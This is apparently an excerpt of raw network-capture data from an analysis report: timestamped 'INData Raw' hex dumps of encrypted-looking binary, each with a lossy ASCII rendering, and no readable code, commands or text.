                                                                                              2021-12-13 23:57:14 UTC3398INData Raw: c8 bf 7b eb 6f e8 c2 af f2 4e d8 af 54 b5 ee 19 9b 4d b3 a2 33 9c 24 b5 7c fc 92 9c e7 ab 6c 06 bb 43 f0 76 80 7d 82 26 df be e6 90 d5 62 3c 19 13 c0 95 e9 28 3b b2 9a 1d 53 4d ed b9 83 94 ae ee 6e 1f b1 65 c5 32 e5 b5 b4 78 f7 de 9d 79 57 eb b5 84 08 99 94 ec 5d 27 2b 97 03 ea 7b af bb d9 37 18 b8 71 56 74 99 66 05 80 ec 08 23 49 d6 83 8f fb 39 c2 a8 9e 4a 99 ff 28 8b d2 f5 30 52 3f 47 83 53 9b b7 ce de 64 9b 54 82 31 53 c1 5b bb 0b 12 cc 3d 99 7a e9 c8 c2 f6 f9 6c 5c a9 ae e2 89 27 cc 85 c4 cb e4 1a 1b 50 f1 6a 4f c4 89 3f f2 91 c2 0f 05 b5 a8 3c b1 b3 1a d9 cc 7e c5 5f 73 8e 47 6d 51 25 e1 e8 5a 5f eb c0 ee 1a 9f f4 1d eb 42 8b 0d f5 f1 a7 b3 f5 a1 46 7c 18 60 49 03 eb 6e 0e 36 b3 1a 13 82 4a bb 4d 6f 5b 57 85 82 f4 6c 41 45 44 97 64 d1 44 f7 d3 13 4d
                                                                                              Data Ascii: {oNTM3$|lCv}&b<(;SMne2xyW]'+{7qVtf#I9J(0R?GSdT1S[=zl\'PjO?<~_sGmQ%Z_BF|`In6JMo[WlAEDdDM
                                                                                              2021-12-13 23:57:14 UTC3399INData Raw: cb d7 ba 49 bb 73 b3 71 23 49 b0 61 69 e1 4c a4 d6 0f 52 71 f1 ad 12 7f a0 58 cd ed d0 34 a6 00 0e 12 95 28 e4 69 8d f9 a9 5c 9d ff e5 9c 8b 84 37 ce 89 a5 2c 24 bd b7 15 10 5a 80 e1 f7 ca 99 2b ba 1e 8c f0 63 23 9b 6a 1b 9d be 4e be 32 9d 16 a9 10 d8 d8 77 d8 25 a0 a0 b9 d0 01 76 ea 96 a4 cf f0 b9 29 3e d7 13 c0 9b 42 24 1f 30 ab f4 64 e3 6e ba 04 71 ff 4f 2c 19 ac 1a 09 10 78 81 97 fb 80 f8 40 47 18 c5 a7 a9 3f fa 5a 3c c8 b5 83 37 d1 ca 56 9a 2f c3 10 50 f3 2b 25 34 93 a4 df 5b a1 bc 7e 42 08 10 c8 c8 1f 29 77 7a a3 b7 6a 81 36 c2 6e 5e 0f ef 1d 59 c0 24 b7 cb 63 b5 b7 f9 15 00 7d e2 90 c7 1f cc d0 ef e7 3e 64 8f 61 91 04 47 88 67 df c7 2a 83 92 fc 56 5b f5 e6 b2 f8 56 58 fd ce 5c 8c 50 72 bd 8d a7 de 2b 44 6c dd 1e 7b 57 b0 95 96 36 56 23 fe e1 a6 e5
                                                                                              Data Ascii: Isq#IaiLRqX4(i\7,$Z+c#jN2w%v)>B$0dnqO,x@G?Z<7V/P+%4[~B)wzj6n^Y$c}>daGg*V[VX\Pr+Dl{W6V#
                                                                                              2021-12-13 23:57:14 UTC3415INData Raw: 76 95 62 da 28 ed e9 e2 81 b7 1c d2 42 8a 92 dd 79 ca fc ba c3 77 44 22 11 95 97 df dd 95 81 8e ea aa 3e e0 64 00 1d e4 c0 cf 15 1e 18 3e 5f 99 17 cf 76 ed 67 7b 9a 89 6d 7d 82 84 de b7 aa a9 29 f3 63 c3 81 82 06 33 78 0f d7 ba 5e 11 6d 5c c9 84 ca f8 cf 05 23 ff 32 b1 10 eb 1e aa 2c 18 5e e8 e8 39 93 18 97 f3 f4 4e 3e cb 80 ba ba ef 63 84 e2 a3 7f b5 59 64 69 ee 8c 7e 8b aa 42 36 0d b0 18 c6 0d a0 e3 99 63 f4 b0 9b 78 39 81 3f 2a 77 ea 2c 6c 5b a7 ab 79 9f de c6 32 fd 9d ac 02 14 3e 54 4a 60 0e 98 d5 96 1b 7d 3c 3b b7 da c6 08 ee 22 05 7a a6 e4 96 ae 1a f7 9e f7 0d 6a 1c fa 72 da b1 82 67 14 61 5e 1b 60 4a 48 91 37 6f d2 53 eb 97 06 a3 14 cf e6 a3 bb 9b 76 05 c5 e7 18 81 62 fc 74 ea 70 db f0 9a 58 16 cb e5 de 32 93 c4 f0 94 02 52 4e 3b 56 ba 2e 94 c1 1f
                                                                                              Data Ascii: vb(BywD">d>_vg{m})c3x^m\#2,^9N>cYdi~B6cx9?*w,l[y2>TJ`}<;"zjrga^`JH7oSvbtpX2RN;V.
                                                                                              2021-12-13 23:57:14 UTC3416INData Raw: f5 94 24 1a a4 9b 9b f9 66 ec 6f 47 9b 70 ae 8d 64 be b1 42 21 1a 2a f1 58 04 2d 0d e6 83 31 f3 1e 09 60 d0 be f4 15 cc b1 e6 44 94 6a d2 9f cd 12 a8 3e 45 f3 7b 67 eb cf 1c 91 20 49 16 f0 e5 c9 d6 52 73 73 91 46 ed ae 30 ef a2 b5 8e 44 6e d1 b7 08 59 06 1a a4 a6 d5 8a 8f 1f 23 cc 07 ce d7 88 b3 89 eb 4e d1 5a cb 37 d4 a7 68 16 7b 45 93 fa 40 81 56 f4 52 f1 97 37 00 1d 8e de 17 ab 3d b7 d7 50 39 ef 80 0d d0 88 fa 06 05 51 8c 4c f6 6e 17 1b 85 be a0 97 4b 4c e1 53 3a 84 9b f0 22 79 c0 ff 97 55 b1 41 9b 75 e4 68 36 e5 c4 53 7c 1f 46 cf 85 40 65 e5 1a f4 16 ec 27 b6 9a 89 35 c7 31 cb 7d 43 f8 c5 40 a0 cb a2 a7 78 35 57 5c c7 09 fb 10 81 ce 68 31 07 dc f6 10 24 5d 19 03 13 ec b6 9e 0c 20 dc 83 d1 8d fa 1c f7 14 d8 d2 81 e2 5c 4b 1d 3c 3d ee b8 a4 10 ed 42 33
                                                                                              Data Ascii: $foGpdB!*X-1`Dj>E{g IRssF0DnY#NZ7h{E@VR7=P9QLnKLS:"yUAuh6S|F@e'51}C@x5W\h1$] \K<=B3
                                                                                              2021-12-13 23:57:14 UTC3432INData Raw: 23 62 8e 32 3d 5f 41 c4 cc 32 4c 1a 01 d7 3a bb 83 9a 5c 68 91 3c 3e 3d dd 45 5e a7 3c 91 2e b8 13 46 15 98 0e 25 22 71 45 79 95 15 4c 0c 46 fd 6e 0d a7 d7 49 8e 07 ed d8 97 d5 55 c7 ce 2a 3d d3 c5 a1 15 af bf 37 0c c4 95 62 ce bc 60 fd ca 6d 50 80 2c 1d 4f 18 77 aa 8e 69 04 fc 49 eb 84 06 17 c6 4a 41 db 33 02 cd 5a ef 8a 14 f7 b6 2c 8e 93 4d 32 2b 02 dd 38 39 d3 15 51 24 27 43 c3 9d 2c 30 ce 12 90 a8 63 8b eb fe 3b ae 10 22 dc dd 8b 3f 64 0b af 7a d6 cf 2e 5e 83 ea 7f c1 63 dc 58 b5 93 dc 63 24 89 6f 73 3e 82 4a 01 20 53 ef 94 08 0e 12 c0 67 78 ad b4 05 db 3d 96 64 24 f2 15 56 ec 89 0a 00 f2 17 f6 2c 97 ce a2 a8 a3 fb f3 df 16 2f 98 d2 f8 69 9e ad 67 1a b4 26 da cf 65 cd ba aa cd b4 90 0e b6 95 20 31 10 ad f3 cf 00 b3 d2 84 3a 97 9d aa af dd ea 29 fc 03
                                                                                              Data Ascii: #b2=_A2L:\h<>=E^<.F%"qEyLFnIU*=7b`mP,OwiIJA3Z,M2+89Q$'C,0c;"?dz.^cXc$os>J Sgx=d$V,/ig&e 1:)
                                                                                              2021-12-13 23:57:14 UTC3433INData Raw: 84 06 a9 2a 52 02 7c 97 3e ce fd 75 6e 68 f7 7c 28 f3 87 21 2f 66 93 f3 62 6a f3 d4 2c 31 4d 62 32 08 d9 b3 25 5f d0 ef 92 70 8b 79 17 3d ff 2a 28 d3 14 85 60 94 fa d7 e4 37 89 ca 27 9b 02 f8 11 de bf c1 5c 60 a4 be e5 3d 44 cb a8 f3 2f d7 56 fe ea d1 fd 22 2c 0a e2 9d e0 84 b2 17 c8 fb 25 21 97 f2 87 9e 2c d1 df 1b 85 c2 b1 c1 41 d8 25 7b 77 88 30 aa b5 3f 25 2a 5a 19 30 ed c9 23 de 41 6a 9a cc a0 b1 8a a1 aa 44 7d 4d 56 33 95 88 1f 61 05 89 b2 9d 22 88 f3 3d 86 8c 28 82 2a cf 5e 33 57 ec 14 40 82 b8 73 9b 83 6c 1e fa 42 37 36 25 d2 b2 1f 98 d8 2d ce 1a 04 97 b7 f9 b1 94 1a db 31 41 7a 6b d3 3b ae 8d a1 d5 8a f3 69 d0 51 97 ec fd e7 ee 90 7c c1 66 b0 aa 6a cf a1 87 29 60 64 8a a2 db a0 8a 3d 04 82 5b 1a 51 95 4b ee 92 fc 20 cd 86 08 67 7c bb c9 13 7c a3
                                                                                              Data Ascii: *R|>unh|(!/fbj,1Mb2%_py=*(`7'\`=D/V",%!,A%{w0?%*Z0#AjD}MV3a"=(*^3W@slB76%-1Azk;iQ|fj)`d=[QK g||
                                                                                              2021-12-13 23:57:14 UTC3449INData Raw: 0a 63 f4 8c 45 e5 4c e1 f3 6e 92 fb 57 c6 bf 58 c0 44 af a0 4b 9a 91 81 f5 bf af ef a9 61 bf 8e 25 59 c0 ec 8c 34 18 37 fc c6 b5 0c ed c9 6c bc e6 62 42 d2 e8 52 97 28 66 81 d7 fe 16 06 83 b4 67 dc 2b d9 67 f9 4a 3a 72 d3 5a 43 3f 8a 30 ac de 55 14 55 48 a3 cb d8 19 b9 83 84 21 71 9b 44 02 88 ac 6b c0 08 7f ff 71 61 97 56 4a a0 a5 02 d5 d9 e7 15 97 a1 0d ee f1 87 63 ec 6b df ab 7b 59 2f 0c 80 44 9c 54 0e 21 68 23 0a a2 f0 83 63 91 17 58 25 1d 7d a1 73 1c 82 8a 11 de 4b c6 16 f6 eb b2 a1 04 be 67 d2 fe a3 82 8d 9f ae b4 a0 02 a4 c3 f1 92 cc af 5a 0a 4d f8 f4 ea ae 12 40 f9 1f c0 b3 a9 98 33 95 5a 78 0e ad 45 b4 1c e3 d0 5e 06 61 45 ed 49 f8 f5 e9 ec 68 13 17 69 3e e7 84 81 21 b6 63 91 09 10 b3 80 07 2e 47 20 ea 89 f4 85 cd 1a e8 f5 e9 91 e7 b4 ca 2b 00 4a
                                                                                              Data Ascii: cELnWXDKa%Y47lbBR(fg+gJ:rZC?0UUH!qDkqaVJck{Y/DT!h#cX%}sKgZM@3ZxE^aEIhi>!c.G +J
                                                                                              2021-12-13 23:57:14 UTC3450INData Raw: 9c c4 25 18 c8 e4 45 62 96 93 d9 18 d5 09 8e 29 e1 92 1c 64 0d 19 8e d2 97 a7 00 0b 80 f4 7f f8 fb a3 5b e4 3a 52 a9 01 bb 8c b3 b4 8e d6 e1 7f 4c d9 06 5b c8 44 e4 f1 24 02 4b 71 3e 65 eb c5 2b c7 3e 0d b3 06 b6 6b 0a 71 99 93 2d 22 9d 36 46 ab 84 fa f6 21 66 07 11 d1 47 62 64 3e ba d3 27 1b f3 00 c2 20 94 0a 7b 03 cb 2a 93 4b 2f a4 ca 62 a2 2f 34 bf 23 58 02 72 85 7a 20 8f 5f cb a2 db 9c 86 83 32 d3 03 4e 22 6d 1d a6 7b c9 7d a0 4d 3d d0 6a 08 89 f3 ea 56 67 7b 5c e9 b9 f0 a9 99 82 58 cb 04 87 b7 f2 45 d1 06 2c cf 55 2e 5d 50 de 17 bc be 7a b2 c4 d5 d3 ff 27 d3 b5 6e 48 ce 16 c5 68 88 ea a4 c4 aa fb 99 81 72 ab 4e 7e dd 3b a8 c5 b0 0c 5c a1 41 36 45 c6 cc 48 98 ac 07 04 5b 40 27 f4 bf d0 03 6d 2c 43 d6 45 02 ec c9 1d 43 8a bd d5 ea fd 40 98 d4 89 17 de
                                                                                              Data Ascii: %Eb)d[:RL[D$Kq>e+>kq-"6F!fGbd>' {*K/b/4#Xrz _2N"m{}M=jVg{\XE,U.]Pz'nHhrN~;\A6EH[@'m,CEC@
                                                                                              2021-12-13 23:57:14 UTC3466INData Raw: 76 87 4d 17 c0 5c 90 f2 c7 e2 5d 7c c0 75 88 c4 a2 a4 a5 19 b0 e5 d2 08 e1 d5 ae 9c 9f b3 1d 29 d3 9e 3a 47 89 1f cf 98 1e 4e 3a 3a 5e a9 ed fb 54 a5 4e 12 51 43 ab 28 85 25 2f ee ac 2f 3f 20 93 ce ec 2f 56 8c 42 3f fd 9c ca 56 70 aa cf e6 09 0a c2 a5 eb 57 f6 32 82 c7 a4 2c 5b e5 8d 63 95 f7 55 0b 1f c3 07 f5 27 dc b0 bb 24 90 a1 ef b2 dc 57 52 07 cc 01 6c b0 a9 ed e9 80 d4 2a 5b 98 72 40 82 85 6c 90 f3 3a 0c 4b b4 de fb 45 26 c2 4d 8a 15 68 96 be c1 9d 8e 2d 6b f1 a8 25 fe 62 c1 38 d7 30 4c 58 26 00 49 86 81 0f c2 01 52 ee aa e8 88 7b c0 47 2e ae 6b eb 11 51 05 3a b9 fb 70 22 88 e2 55 d8 2f a3 f4 de 63 a0 72 9c af 8d a5 e3 9a 46 3f 7e 80 e1 35 eb 8f 4d 63 7c f2 04 fb 20 ec fa 4e f4 ca 9e 67 63 17 7b eb 8a 4f 35 1a 09 da 0f a9 1e e9 58 a8 85 01 f3 24 3e
                                                                                              Data Ascii: vM\]|u):GN::^TNQC(%//? /VB?VpW2,[cU'$WRl*[r@l:KE&Mh-k%b80LX&IR{G.kQ:p"U/crF?~5Mc| Ngc{O5X$>
                                                                                              2021-12-13 23:57:14 UTC3467INData Raw: 82 3e aa 83 44 f5 08 0c 9d 7f dd 8f 4b 99 dd ad af 63 0d 58 0f e4 33 8f 70 fd 99 b0 c8 be b1 c4 75 96 50 08 9e a9 c5 66 cb 8b 14 05 07 cd 74 77 dd a9 de 8b 94 d2 f9 73 ad 6e 31 dd af a9 e4 8e 15 34 c7 a2 0a 6e 8b 1c f5 ab 65 ae 66 47 16 80 5c d4 62 91 80 39 2c 19 68 4f 45 29 bb bd 20 96 c6 66 30 f2 6d e7 16 a4 18 90 5c eb 45 f7 99 69 b1 bb e5 dd e8 7c 22 06 27 bd 3b 40 e5 81 64 0e e6 1f 59 e9 92 6d c8 45 72 75 64 a1 16 cf 49 3d c7 a0 bb 90 d2 84 d9 a4 03 6a 0f 91 53 bf 94 9e 05 ad a5 0e 0f d7 78 2e 17 5a 64 6a 39 a2 c0 9d 28 91 bc 2a a7 ad 20 d5 d8 7d f6 26 ed 2f 91 ad 41 4a d9 33 38 8a 76 df c0 74 e7 bf 90 e6 2a 7d da d1 c6 38 10 fc 9d c9 21 fb 0c 80 f4 bd 04 07 b7 b8 c1 f7 54 37 1a 58 50 73 a6 f8 d7 07 b5 07 f3 a3 7a d2 e8 e3 1f 44 83 af 35 bd 85 a5 81
                                                                                              Data Ascii: >DKcX3puPftwsn14nefG\b9,hOE) f0m\Ei|"';@dYmErudI=jSx.Zdj9(* }&/AJ38vt*}8!T7XPszD5
                                                                                              2021-12-13 23:57:14 UTC3483INData Raw: f4 73 eb 97 a3 41 26 d0 48 a1 10 4d 88 73 6e e6 97 0e cf 4d 6b 25 36 78 1d 07 5c 7b f3 06 15 57 7d a1 eb 02 d3 44 4b 01 03 e5 d3 a8 9e 52 7a e0 2c e9 12 f5 d3 b7 76 e6 48 6e 45 ca 18 5f 58 e2 93 f8 74 f5 9a 46 f5 ae 69 7f 21 c8 6c 4c 76 58 87 6a 69 e2 bc c0 ad 81 10 19 ef 57 40 b5 7e b4 5c c0 d4 11 2f 4f 9d 9e be 35 34 c4 86 f0 be 1e 22 d0 1a 26 4b fa df d2 e5 15 72 99 e5 e5 a7 3a 7d 91 1e 3f 06 b5 6f 80 10 55 62 af e7 92 7e da bf 57 a9 96 f4 3a 07 fb 56 b3 f8 0a 45 2f 35 e1 27 3e 57 d0 4b 9b a4 c7 6f 11 5a 44 b1 0d 0d 57 2a 95 c3 58 2f c2 16 8a 81 27 f3 b6 96 fc 97 5e 5c 53 ed 0b 18 6e 90 ce a2 95 2b 89 ae aa 20 a2 14 6f 0f 14 29 3f 4f 94 3a 9f e3 90 c2 37 31 74 58 9f 3c ea 05 3d 26 da 96 62 b3 cb 6e 84 be e2 d2 72 99 b2 94 f9 95 51 89 17 95 c2 c1 9a c3
                                                                                              Data Ascii: sA&HMsnMk%6x\{W}DKRz,vHnE_XtFi!lLvXjiW@~\/O54"&Kr:}?oUb~W:VE/5'>WKoZDW*X/'^\Sn+ o)?O:71tX<=&bnrQ
                                                                                              2021-12-13 23:57:14 UTC3484INData Raw: e6 5e de bf 22 ba fe 93 4f af 7e ff 71 c3 dd dc 46 d0 3c ca 4c 8e 91 55 3a b8 db a4 68 d9 8e 2f fa d4 47 aa be 02 32 d7 0d 93 83 95 4e 12 1a 40 82 6a 39 16 bc d2 c3 aa fe dd 43 46 78 b9 4e 29 79 fe 48 99 8a ce 4d 14 20 14 21 c7 43 b2 b9 d5 4a f2 de 60 61 ab 21 47 51 35 6a 6f ad 96 db 98 31 31 94 ef 24 6f 26 84 cf ae 87 44 c9 81 56 96 d2 e9 b9 3f 76 58 94 e2 b0 7e f5 96 9e be 2f 30 c8 17 7e 76 79 46 8c d9 52 b2 34 92 02 43 b5 7a f1 df 76 09 41 ed 0a 7e b3 c6 df dd 8b cd 29 88 fa fc 02 ee 81 45 29 b4 11 d2 6c 5d 0b 9d db be 03 41 af e0 1c 27 73 4a bc 86 1c 6f 5e b3 23 bd 55 7e 7e 2c 1c da 7d 18 21 64 a6 fd 72 99 6a a8 56 b4 17 9f a2 b9 df fb dc c2 ca 45 36 d7 69 3d 65 7e 95 7f 8e fe 4d c0 21 f2 aa 7a dc 10 58 ad ba 9f 1c 35 83 2b 9a fc 97 6a 12 82 62 d4 20
                                                                                              Data Ascii: ^"O~qF<LU:h/G2N@j9CFxN)yHM !CJ`a!GQ5jo11$o&DV?vX~/0~vyFR4CzvA~)E)l]A'sJo^#U~~,}!drjVE6i=e~M!zX5+jb
                                                                                              2021-12-13 23:57:14 UTC3500INData Raw: 08 36 d8 fb 82 0c 7a 19 33 7a 79 50 41 c4 12 8f ca f2 29 1b 8b ec fd 7e 80 b2 3e 5d 00 17 df 5c 27 e8 8e 9a d2 c2 cf 6d 1c 89 e7 d1 00 8d 7f 9c d4 6c 41 c4 74 e4 18 57 28 a3 fa 08 51 96 52 7d c9 c1 a0 cd 06 bb dc a2 41 92 35 66 41 56 57 0b 7f cb 2a e9 4e 99 9c 14 3f 25 bf 30 0b 6a db 23 fd cb ee af 66 e7 28 3e 89 8f 5c 83 c1 f6 96 31 a6 76 57 db 01 da da 8a 4e 8b 4a 54 13 0b 51 9f 53 b1 d1 61 e8 89 54 80 d4 74 e4 9d 9e 67 e8 2a c9 7f 9d d1 dc db 4c 82 9a 94 2a 2d be 09 8c 33 2d d8 2d fe 99 a6 8e d9 7a 8d 69 d5 cd 96 de 5a 5d eb a1 c5 41 2b b4 50 e8 c7 74 66 30 10 ea 6c 9b 5b 76 e4 a9 92 55 f6 02 1f c9 1b e7 6f 66 e7 ad ee 8f ca 85 87 77 d1 ae 5f 58 4f 22 60 df 00 37 b3 00 97 fb 64 4f ce 65 04 8a d2 10 63 11 e0 f7 f5 82 bf 7d de 24 41 64 81 9a a8 f5 46 23
                                                                                              Data Ascii: 6z3zyPA)~>]\'mlAtW(QR}A5fAVW*N?%0j#f(>\1vWNJTQSaTtg*L*-3--ziZ]A+Ptf0l[vUofw_XO"`7dOec}$AdF#
                                                                                              2021-12-13 23:57:14 UTC3501INData Raw: 96 5f bc c2 b4 77 9c fa 84 6a 8d 24 0a 15 a4 12 c9 52 0e 3e f7 83 09 00 cc 4b 85 81 fd 18 9c b5 d8 1b 3b 01 76 e0 11 ac 70 11 e5 dd 57 6f df d8 cd 01 c3 a9 92 87 58 f2 26 0a 59 96 9e 3d 41 1a d6 37 fe a3 c0 c8 01 a5 77 9c bb 14 e7 31 ae 9e ce 8c 51 26 11 53 ba d8 84 d3 a6 3b c1 c1 60 97 9d 41 7c 4c 30 c8 df 16 39 e2 6e e4 bf c8 d4 9d 91 98 97 2f 9f 2b bd ce cf 39 cc d9 a0 79 9b b9 d0 63 ee f3 9d f0 cd 59 ab 64 09 d7 28 b2 9c fe b1 97 fc 4c 65 9b ee c6 6c af 64 19 6c 96 6f 4a 9a fa b6 3b cd 74 09 49 f6 c3 95 e7 bb c7 2a 33 6e d7 6e 19 28 e8 80 c3 65 f9 66 67 10 be 08 26 0e e0 f3 27 4a 4c 4d 3f 0e ef 25 71 f8 de 3d 6c 8e 51 8a 90 95 7d ec 83 f9 1c f9 0f fc 42 fe 64 d2 b0 6e 15 1e 74 26 1a b0 1e cd 5f 95 19 a0 12 73 8c 83 ae d4 43 a3 25 ca fb ff c6 75 38 18
                                                                                              Data Ascii: _wj$R>K;vpWoX&Y=A7w1Q&S;`A|L09n/+9ycYd(LeldloJ;tI*3nn(efg&'JLM?%q=lQ}Bdnt&_sC%u8
                                                                                              2021-12-13 23:57:14 UTC3517INData Raw: 75 b2 91 bc 64 b4 81 77 a9 84 61 c9 2c 30 a9 5e fd ae f4 ae d3 e3 69 b7 e4 74 f5 54 67 08 0b 5d 97 69 d1 3f 62 34 4f d4 75 62 1d 0b 21 c1 30 06 92 51 db f2 1b 58 ea 2e ec 44 57 e3 21 8e b9 37 e0 37 03 29 f4 ab 3c 32 88 44 07 9b b9 7a fd 53 5c d8 fb 9a 1f f3 bc d8 0f e7 3a c5 25 c3 2f 56 4e 2e 31 ed 86 53 30 ce ea 03 f2 92 f0 60 c0 71 77 0a 65 a2 25 8a b3 de 07 ea e5 c4 63 f7 9d b6 ff 36 16 3c 3f 6c f0 f9 91 28 d1 b5 17 75 4b b2 b8 3f 7d c2 d6 77 27 fb 3f cf 12 57 9f f7 4f 68 c7 fb 9c af b1 88 f0 63 b0 e7 ed e3 f3 a0 2b a2 2e 80 f4 01 94 1f be f6 44 92 7d ce 20 ab 8f cf a0 be d0 ef 94 e6 9a ae eb 21 4f a5 c3 c7 dd 6c a4 d8 ac cb c6 2c 00 e3 85 02 f2 7d 46 25 b1 a3 77 96 7f 0d 37 3f f5 1b 69 49 6e 43 74 1f 21 55 71 bc 9c 0e b1 d0 c7 8a 41 96 fe 34 f1 39 0b
                                                                                              Data Ascii: udwa,0^itTg]i?b4Oub!0QX.DW!77)<2DzS\:%/VN.1S0`qwe%c6<?l(uK?}w'?WOhc+.D} !Ol,}F%w7?iInCt!UqA49
                                                                                              2021-12-13 23:57:14 UTC3518INData Raw: 7c a4 2e e8 fb fe 18 3d b8 53 51 82 88 77 e7 15 8f 76 c1 8a b2 9a 11 0b a3 fa fc ac b8 0c 78 01 fc 47 5b db 0c 5a 3c 55 bd 93 8d f4 17 d5 f2 33 0a 65 7c b8 9b d0 c8 1f ee 0c 13 b9 bd f3 4f 5f 7f bb 1c 39 44 7a f6 03 b9 33 55 22 42 00 37 19 fd c7 c9 98 ea c0 0e f6 52 50 f0 30 8a 48 c4 b5 04 90 b1 2e e9 49 c2 ff 56 f9 42 f5 5a 30 a4 7e 51 66 ea 6e f7 f0 35 87 de 58 07 db 74 67 2b 1c c1 a8 cd 00 36 f8 cb 5b 5d 32 c6 4d 46 e0 26 89 28 9f 0b 11 86 f3 65 43 4f 83 51 35 6a 87 c5 84 21 f5 2d dd 51 91 c4 ea 3c be 48 1e b4 23 8a 48 c2 7f b0 67 3c a4 5c 80 c4 8c 2f de ab 10 24 a3 57 ea d0 7e f5 0a f7 a1 ff bc 81 d3 c4 10 00 e0 8e d1 f1 f6 bf ae 9c 08 c5 08 d0 fe 8f 5e bd f8 00 4c 14 e9 06 4b c7 93 aa f0 18 e8 f2 03 bb 2a ef 9f 1b 41 07 fd df 1b be c6 8b 35 35 65 6c
                                                                                              Data Ascii: |.=SQwvxG[Z<U3e|O_9Dz3U"B7RP0H.IVBZ0~Qfn5Xtg+6[]2MF&(eCOQ5j!-Q<H#Hg<\/$W~^LK*A55el
                                                                                              2021-12-13 23:57:14 UTC3534INData Raw: 04 a7 18 ec d8 e4 da 1f 21 42 25 50 28 7c df 7a 47 43 66 0f da de 13 cd 9f ca c2 94 b0 d7 3b 27 92 86 b1 a4 cb 2a 96 80 4b 8d 17 21 7c e4 17 5b 69 f9 17 1c e7 e3 56 57 9c a7 95 25 0c 07 88 91 1c ea e2 b7 ba 1f 95 e3 a5 bc ce 40 b2 32 62 c0 61 5a 80 38 40 69 82 3f 7d 69 9e 12 64 60 fa 0a 16 08 9f 06 4d dd 10 cc ae 53 9c 5c 39 8a f8 a5 76 8c c7 9b 94 7f a4 a6 2c 65 09 c8 2b e8 46 20 f9 7d bf 81 10 3a d8 ae f2 66 d1 ef a3 7a 27 7d 68 52 c1 8c 94 6c 90 47 14 f1 4c 95 e0 72 08 30 38 2f 61 fc d3 a3 ac 4c 5e 17 2b 33 0b ed 31 be 6e d7 b2 cb 62 97 08 fd 50 b1 3f 12 43 b0 8b 7b b1 5b 0b 09 19 07 08 cf e5 fb f7 45 98 84 5b 1f a2 42 fd f9 80 08 ab 44 20 b1 81 03 c4 b2 0d ef 72 ac de fb d7 0f 8e 25 b2 70 d7 59 e3 4e 2d 19 57 85 a3 cc e9 c1 b1 12 94 52 22 02 55 67 90
                                                                                              Data Ascii: !B%P(|zGCf;'*K!|[iVW%@2baZ8@i?}id`MS\9v,e+F }:fz'}hRlGLr08/aL^+31nbP?C{[E[BD r%pYN-WR"Ug
                                                                                              2021-12-13 23:57:14 UTC3535INData Raw: e2 f7 1c 48 cc 4d b2 69 ab 48 43 0d 51 a4 3e f8 d7 2c b7 53 95 17 39 ad 2f 87 f3 7c 6f ec 31 18 b0 8f 5c 57 6a 91 9f be dd 07 18 cf 43 d0 2e ac cc 22 a7 b3 05 1e 80 28 20 40 1f 7d c0 3b e8 a0 e7 89 99 0b 8b bc 35 b7 f3 f2 ae c2 50 f8 61 41 48 ec 82 fd 30 b3 42 9a be 15 a6 17 76 d4 13 f9 dc 56 d6 e3 b0 56 6b c5 12 1a 9e 8c 2e 4a 60 cf 83 bd b6 d6 b2 ce be 1b 4e 8e d2 13 9d e2 03 0d ff 95 8b 80 f2 2f 0d 9f 68 cd b3 a4 9f 4c 90 5f 18 7f 16 04 19 67 7a d5 20 9c b6 6e 90 b8 7a 2e 0c 2e d9 50 45 43 b1 de a0 16 fd a2 6d 3c 60 03 52 6b 5b 18 68 22 a5 4e 2d 55 87 e9 43 30 17 eb dd e4 de 8e c0 35 ff 9c f3 6a 96 9e d1 c2 8c 3c c5 47 fd 31 bb ee 4f ef 6d c9 b4 64 2a c1 b6 9c 2c 16 ef 81 77 02 d7 f6 fb 85 1a d5 04 86 fd 1b 84 29 d7 d1 27 7c 29 b9 ac 09 34 1f 6f b1 b8
                                                                                              Data Ascii: HMiHCQ>,S9/|o1\WjC."( @};5PaAH0BvVVk.J`N/hL_gz nz..PECm<`Rk[h"N-UC05j<G1Omd*,w)'|)4o
                                                                                              2021-12-13 23:57:14 UTC3551INData Raw: 47 0f e8 6d 7e ea b5 9a 6e 9e f2 66 bc f3 c4 c0 14 5c f3 30 c9 92 30 55 bc 7b 1f 04 60 02 3f 92 39 55 0a 9e 62 b7 ee 75 75 72 5e d4 da d2 56 77 88 7b ee 0a a1 47 f5 84 12 53 49 fd 3d cf 6e c2 0c 66 14 ec 23 eb 9e b0 11 42 0f 96 c3 e2 04 93 f6 87 27 cb c1 0c 45 b5 6e 7c 5c 84 62 99 05 be 60 7c 01 e3 b1 0f 34 6b bb 58 f0 c7 e3 54 00 27 00 d0 2e 78 c6 4e 00 08 ad 53 8e 76 4c 10 6e 53 ca 35 a4 44 8d 77 05 05 ce 97 f7 a1 fa 7a 53 d9 90 04 5f 19 ab c9 23 0a e3 a3 6f ec d9 2d d7 27 9c 81 42 74 6c 3d 31 07 8d 2c 54 e1 7d 2c 39 e7 2e c6 bb d6 d7 ec 72 89 1e a6 c2 6a e4 7b 1c 47 65 f1 26 7d 09 1c f9 30 c2 ee 55 47 c2 78 cc c6 e2 fd c4 a2 ce 62 ef a2 db 31 5f 6d 72 17 4d da 6d 88 52 24 11 5c d3 22 85 93 47 20 3b dc 06 48 3d 37 8d fe e7 d0 7c aa 83 2b 8d 44 83 3d a6
                                                                                              Data Ascii: Gm~nf\00U{`?9Ubuur^Vw{GSI=nf#B'En|\b`|4kXT'.xNSvLnS5DwzS_#o-'Btl=1,T},9.rj{Ge&}0UGxb1_mrMmR$\"G ;H=7|+D=
                                                                                              2021-12-13 23:57:14 UTC3552INData Raw: fc 09 b6 44 e7 dc 93 b0 a0 bd 0c 51 fd 9d 39 73 58 97 0f fc eb 1c b5 0d 19 a7 98 59 20 67 23 08 45 fa 98 98 53 4a 81 db 93 8e 2e ed 8a 38 02 7c ee 04 5d bb 2d fe da f0 1a 78 7d ea b1 41 88 a4 dd 34 b7 e9 27 ec 9b 6b e1 ae fe 70 33 38 66 33 8e bd 4c 04 cc dd dc f4 28 ed 68 10 27 2f db a5 4f cd b6 c7 23 e0 ca 49 d6 77 70 5e 70 a2 40 0e 6e 25 a5 82 a8 20 4c e2 5e 7a db 91 83 a0 f2 e1 7a 88 cc ed 97 44 54 e8 9d 5e 60 50 c0 9e d9 a2 c4 a7 dd c8 9a 1c c4 65 95 be a4 5d e5 ec 06 f9 7f e5 f7 57 9e f0 09 98 47 7a dd 30 8e 08 69 58 d6 37 a6 fa 13 b6 5f eb c1 16 2f f5 98 96 ed 18 91 5e 9d 16 98 b1 e3 f8 8d 9f 8c ee 9f e3 78 0f 44 a5 44 45 a5 20 c7 1e 10 0c d7 21 44 12 93 db c3 be 52 79 ed 41 25 e2 a4 b2 ba 26 36 e3 75 f5 83 87 cd 2e be 80 76 b5 2f b6 a8 e9 98 e1 4d
